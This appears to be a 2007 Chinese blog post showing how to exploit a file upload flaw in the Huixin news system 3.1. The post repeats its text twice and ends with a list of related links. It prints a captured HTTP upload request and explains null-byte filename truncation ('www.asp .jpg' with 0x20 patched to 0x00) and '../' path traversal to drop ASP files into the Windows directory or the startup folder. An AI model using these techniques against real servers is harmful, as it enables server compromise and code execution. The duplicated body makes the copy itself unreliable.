文件上传漏洞在惠信中的应用
2007-01-16 00:00
246 查看
近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧!
惠信新闻系统3.1 windows2000+sp4
先看这句代码。admin_uploadfilesave.asp
...............
Server.mappath(formPath&file.FileName)
............................
保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因为系统有固定的路径 ,改路径的话,上传不会成功)
这是我捕获的数据:
POST /admin_uploadfilesave.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://127.0.0.1/admin_uploadfile.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d42cb1f101ae
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 658
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="act"
upload
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="upcount"
1
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="filepath"
newstxt/
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="file1"; filename="G:\www.asp .jpg"
Content-Type: text/plain
<% language=vbscript %>
<ihihoiojpojppokkhhkhkhkhk
hkhjkjkjjlkkkkkk>
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="Submit"
提交
-----------------------------7d42cb1f101ae--
我将其中filename 处改为www.asp+(空格).jpg,同dvbbs利用一样改content_length的长度,然后用编辑器修改空格十六进制20为00,上传成功!呵呵!
再看路径我们不能改,那能不能利用../../这样的方式回切呢?试试就知道了,捕获数据同上,将name="filepath"
newstxt/ 改为: newstxt/../../../winnt
content-length:658 改为:(658+14)672
好,开始上传,哈哈!在winnt下发现www.asp文件。那我们就可以将路径改为windows的自启动目录,上传exe,vbs,bat...文件。不过以上都要在获得新闻系统的管理者之后,进一步进入。
惠信新闻系统3.1 windows2000+sp4
先看这句代码。admin_uploadfilesave.asp
...............
Server.mappath(formPath&file.FileName)
............................
保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因为系统有固定的路径 ,改路径的话,上传不会成功)
这是我捕获的数据:
POST /admin_uploadfilesave.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://127.0.0.1/admin_uploadfile.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d42cb1f101ae
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 658
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="act"
upload
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="upcount"
1
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="filepath"
newstxt/
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="file1"; filename="G:\www.asp .jpg"
Content-Type: text/plain
<% language=vbscript %>
<ihihoiojpojppokkhhkhkhkhk
hkhjkjkjjlkkkkkk>
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="Submit"
提交
-----------------------------7d42cb1f101ae--
我将其中filename 处改为www.asp+(空格).jpg,同dvbbs利用一样改content_length的长度,然后用编辑器修改空格十六进制20为00,上传成功!呵呵!
再看路径我们不能改,那能不能利用../../这样的方式回切呢?试试就知道了,捕获数据同上,将name="filepath"
newstxt/ 改为: newstxt/../../../winnt
content-length:658 改为:(658+14)672
好,开始上传,哈哈!在winnt下发现www.asp文件。那我们就可以将路径改为windows的自启动目录,上传exe,vbs,bat...文件。不过以上都要在获得新闻系统的管理者之后,进一步进入。
相关文章推荐
- 文件上传漏洞在惠信中的应用
- SpringBoot | 第十七章:web应用开发之文件上传
- 3、应用SmartUpload实现文件上传下载
- WordPress Lazy SEO插件lazyseo.php脚本任意文件上传漏洞
- 应用上传至APPStore,证书临时文件,以及svn一些实践经验
- iOS应用内HTTP服务上传文件
- ueditor1.3.6jsp版在struts2应用中上传图片报"未找到上传文件"解决方案
- WordPress OptimizePress插件任意文件上传漏洞
- Joom la com_ksadvertiser远程文件上传漏洞
- php函数伪静态、MVC单一入口与文件上传安全漏洞
- Android应用开发之使用Socket进行大文件断点上传续传
- Tomcat任意文件上传漏洞CVE-2017-12615复现测试
- 【Web应用】JAVA网络上传大文件报500错误
- 攻防:文件上传漏洞的攻击与防御
- Android应用开发之使用Socket进行大文件断点上传续传
- 通过 http 协议上传文件(rfc1867协议概述,jsp 应用举例,客户端发送内容构造)
- fckeditor文件上传漏洞(.NET)
- asp.net(C#)中上传大文件的几中常见应用方法
- ewebeditor for php任意文件上传漏洞
- Android下的应用编程——用HTTP协议实现文件上传功能